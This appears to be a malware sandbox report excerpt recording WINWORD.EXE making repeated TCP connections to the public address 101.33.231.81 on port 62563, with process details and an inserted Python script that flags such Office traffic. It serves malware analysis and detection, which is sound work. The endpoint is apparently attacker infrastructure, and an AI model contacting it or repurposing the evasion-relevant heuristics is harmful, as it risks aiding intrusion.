Jun 16, 2022 14:14:13.419831991 CEST | 62563 | 49171 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:13.419950962 CEST | 49171 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:13.420351028 CEST | 49171 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:13.639630079 CEST | 62563 | 49171 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:13.639849901 CEST | 62563 | 49171 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:13.639898062 CEST | 62563 | 49171 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:13.640002012 CEST | 49171 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:13.640063047 CEST | 49171 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:13.640408993 CEST | 49171 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:13.640434980 CEST | 49171 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:13.860094070 CEST | 62563 | 49171 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:13.860392094 CEST | 49171 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:19.710747004 CEST | 49172 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:19.936655045 CEST | 62563 | 49172 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:19.936779022 CEST | 49172 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:19.937015057 CEST | 49172 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:20.162826061 CEST | 62563 | 49172 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:20.163181067 CEST | 62563 | 49172 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:20.163198948 CEST | 62563 | 49172 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:20.163311958 CEST | 49172 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:20.164453983 CEST | 49172 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:20.389482021 CEST | 62563 | 49172 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:24.171586037 CEST | 49173 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:24.391859055 CEST | 62563 | 49173 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:24.392083883 CEST | 49173 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:24.392182112 CEST | 49173 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:24.620903969 CEST | 62563 | 49173 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:24.621507883 CEST | 62563 | 49173 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:24.621608973 CEST | 62563 | 49173 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:24.621690035 CEST | 49173 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:24.621742010 CEST | 49173 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:24.653074026 CEST | 49174 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:24.879235983 CEST | 62563 | 49174 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:24.879453897 CEST | 49174 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:24.879733086 CEST | 49174 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:25.105087996 CEST | 62563 | 49174 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:25.105336905 CEST | 62563 | 49174 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:25.105357885 CEST | 62563 | 49174 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:25.105380058 CEST | 62563 | 49174 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:25.105386972 CEST | 49174 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:25.105397940 CEST | 62563 | 49174 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:25.105415106 CEST | 49174 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:25.105420113 CEST | 62563 | 49174 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:25.105422020 CEST | 49174 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:25.105441093 CEST | 62563 | 49174 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:25.105463982 CEST | 49174 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:25.105475903 CEST | 49174 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:25.105485916 CEST | 49174 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:25.107275963 CEST | 49174 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:25.282200098 CEST | 49175 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:25.332889080 CEST | 62563 | 49174 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:25.520860910 CEST | 62563 | 49175 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:25.522223949 CEST | 49175 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:25.529230118 CEST | 49175 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:25.767404079 CEST | 62563 | 49175 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:25.767446995 CEST | 62563 | 49175 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:25.767477036 CEST | 62563 | 49175 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:25.767688990 CEST | 49175 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:25.773453951 CEST | 49175 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:25.798341036 CEST | 49175 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:26.035690069 CEST | 49176 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:26.042843103 CEST | 62563 | 49175 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:26.267914057 CEST | 62563 | 49176 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:26.272712946 CEST | 49176 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:26.705780029 CEST | 49176 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:26.935129881 CEST | 62563 | 49176 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:26.935430050 CEST | 62563 | 49176 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:26.935553074 CEST | 49176 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:26.935630083 CEST | 62563 | 49176 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:26.935693026 CEST | 49176 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:26.972496033 CEST | 49176 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:26.981375933 CEST | 49177 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:27.199357033 CEST | 62563 | 49177 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:27.199461937 CEST | 49177 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:27.199563980 CEST | 49177 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:27.204574108 CEST | 62563 | 49176 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:27.425786972 CEST | 62563 | 49177 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:27.426418066 CEST | 62563 | 49177 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:27.426486015 CEST | 62563 | 49177 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:27.426542044 CEST | 49177 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:27.426580906 CEST | 49177 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:27.699702024 CEST | 49177 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:27.699749947 CEST | 49177 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:27.795510054 CEST | 49178 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:27.917646885 CEST | 62563 | 49177 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:27.917768002 CEST | 49177 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:28.021208048 CEST | 62563 | 49178 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:28.021270037 CEST | 49178 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:28.021584988 CEST | 49178 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:28.252446890 CEST | 62563 | 49178 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:28.252801895 CEST | 62563 | 49178 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:28.252918959 CEST | 62563 | 49178 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:28.253289938 CEST | 49178 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:28.253407955 CEST | 49178 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:28.273581982 CEST | 49179 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:28.486635923 CEST | 62563 | 49178 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:28.498446941 CEST | 62563 | 49179 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:28.498533964 CEST | 49179 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:28.498740911 CEST | 49179 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:28.723367929 CEST | 62563 | 49179 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:28.724132061 CEST | 62563 | 49179 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:28.724153042 CEST | 62563 | 49179 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:28.724286079 CEST | 49179 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:28.724567890 CEST | 49179 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:28.727380037 CEST | 49180 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:28.944974899 CEST | 62563 | 49180 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:28.945199013 CEST | 49180 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:28.945367098 CEST | 49180 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:28.949407101 CEST | 62563 | 49179 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:29.165206909 CEST | 62563 | 49180 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:29.165652990 CEST | 62563 | 49180 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:29.165743113 CEST | 62563 | 49180 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:29.165776968 CEST | 49180 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:29.165808916 CEST | 49180 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:29.165961027 CEST | 49180 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:29.352849007 CEST | 49181 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:29.391634941 CEST | 62563 | 49180 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:29.578943014 CEST | 62563 | 49181 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:29.579046011 CEST | 49181 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:29.579180002 CEST | 49181 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:29.796778917 CEST | 62563 | 49181 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:29.797437906 CEST | 62563 | 49181 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:29.797458887 CEST | 62563 | 49181 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:29.797610044 CEST | 49181 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:29.800673008 CEST | 49181 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:30.019037008 CEST | 62563 | 49181 | 101.33.231.81 | 192.168.2.22 |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49171 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 16, 2022 14:14:13.420351028 CEST | 1 | OUT | |
Jun 16, 2022 14:14:13.639849901 CEST | 2 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49172 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 16, 2022 14:14:19.937015057 CEST | 3 | OUT | |
Jun 16, 2022 14:14:20.163181067 CEST | 4 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
10 | 192.168.2.22 | 49181 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 16, 2022 14:14:29.579180002 CEST | 19 | OUT | |
Jun 16, 2022 14:14:29.797437906 CEST | 19 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.22 | 49173 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 16, 2022 14:14:24.392182112 CEST | 4 | OUT | |
Jun 16, 2022 14:14:24.621507883 CEST | 4 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
3 | 192.168.2.22 | 49174 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 16, 2022 14:14:24.879733086 CEST | 6 | OUT | |
Jun 16, 2022 14:14:25.105336905 CEST | 6 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
4 | 192.168.2.22 | 49175 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 16, 2022 14:14:25.529230118 CEST | 13 | OUT | |
Jun 16, 2022 14:14:25.767446995 CEST | 13 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
5 | 192.168.2.22 | 49176 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 16, 2022 14:14:26.705780029 CEST | 14 | OUT | |
Jun 16, 2022 14:14:26.935430050 CEST | 14 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
6 | 192.168.2.22 | 49177 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 16, 2022 14:14:27.199563980 CEST | 15 | OUT | |
Jun 16, 2022 14:14:27.426418066 CEST | 15 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
7 | 192.168.2.22 | 49178 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 16, 2022 14:14:28.021584988 CEST | 16 | OUT | |
Jun 16, 2022 14:14:28.252801895 CEST | 16 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
8 | 192.168.2.22 | 49179 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 16, 2022 14:14:28.498740911 CEST | 17 | OUT | |
Jun 16, 2022 14:14:28.724132061 CEST | 18 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
9 | 192.168.2.22 | 49180 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 16, 2022 14:14:28.945367098 CEST | 18 | OUT | |
Jun 16, 2022 14:14:29.165652990 CEST | 18 | IN |
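The session table above is the behavioural core of this report: WINWORD.EXE itself, not a child process, opens eleven TCP connections from consecutive client ports (49171 to 49181) to 101.33.231.81 on port 62563 within about sixteen seconds. The script below is an added triage example, not part of the sandbox output; it parses session rows in the report's pipe-separated layout (the rows embedded here are copied from the table above) and applies heuristics that are this example's own assumptions: an Office binary initiating TCP, a public destination IP, a destination port other than 80/443, and repeated connections to the same endpoint.

```python
"""Triage a sandbox TCP session table: which process talked to which endpoint,
how often, and does that look like normal Office traffic?

Added example for the analysis report, not part of the sandbox output. The
session rows are copied from the report's table; the expectation set (Office
binaries, allowed ports, repeat threshold) is this example's own assumption.
"""
import ipaddress
from collections import Counter

# Assumption: image names of Office processes that should not be opening raw TCP
# sessions to arbitrary endpoints.
OFFICE_BINARIES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Assumption: the only ports Office is expected to reach directly are HTTP(S).
EXPECTED_PORTS = {80, 443}

# Rows copied from the report's session table (Session ID | Source IP |
# Source Port | Destination IP | Destination Port | Process). Raw string so the
# Windows path keeps its backslashes.
SESSION_ROWS = r"""
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
---|---|---|---|---|---|
0 | 192.168.2.22 | 49171 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
1 | 192.168.2.22 | 49172 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
2 | 192.168.2.22 | 49173 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
3 | 192.168.2.22 | 49174 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
4 | 192.168.2.22 | 49175 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
5 | 192.168.2.22 | 49176 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
6 | 192.168.2.22 | 49177 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
7 | 192.168.2.22 | 49178 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
8 | 192.168.2.22 | 49179 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
9 | 192.168.2.22 | 49180 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
10 | 192.168.2.22 | 49181 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"""


def parse_sessions(text: str) -> list:
    """Parse pipe-separated session rows; header and separator lines are skipped."""
    sessions = []
    for line in text.splitlines():
        cols = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cols) != 6 or not cols[0].isdigit():
            continue
        sessions.append({
            "id": int(cols[0]), "src": cols[1], "sport": int(cols[2]),
            "dst": cols[3], "dport": int(cols[4]), "process": cols[5],
        })
    return sessions


def triage(sessions: list, min_sessions: int = 5) -> list:
    """One finding per (process, destination, port) tuple that breaks an expectation.

    Groups sessions by endpoint so a burst of reconnects to one server is
    reported once, with the count and every reason that fired.
    """
    groups = Counter((s["process"], s["dst"], s["dport"]) for s in sessions)
    findings = []
    for (proc, dst, dport), n in sorted(groups.items()):
        image = proc.rsplit("\\", 1)[-1].lower()
        reasons = []
        if image in OFFICE_BINARIES:
            reasons.append("Office process initiating TCP connections itself")
        if ipaddress.ip_address(dst).is_global:
            reasons.append("destination is a public IP address")
        if dport not in EXPECTED_PORTS:
            reasons.append(f"non-standard destination port {dport}")
        if n >= min_sessions:
            reasons.append(f"{n} separate connections to the same endpoint in one run")
        if reasons:
            findings.append({"process": image, "endpoint": f"{dst}:{dport}",
                             "sessions": n, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(parse_sessions(SESSION_ROWS)):
        print(f"{f['process']} -> {f['endpoint']} ({f['sessions']} sessions)")
        for r in f["reasons"]:
            print("  -", r)
```

Grouping by endpoint rather than by session is deliberate: a downloader that retries, or a server that closes the connection after each request, produces many short sessions to one address, and the count is itself the signal. On a host without DNS traffic in the same window, a public destination reached by literal IP is a further point a triager would note.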
Target ID: | 0 |
Start time: | 14:14:11 |
Start date: | 16/06/2022 |
Path: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f040000 |
File size: | 1423704 bytes |
MD5 hash: | 9EE74859D22DAE61F1750B3A1BACB6F5 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |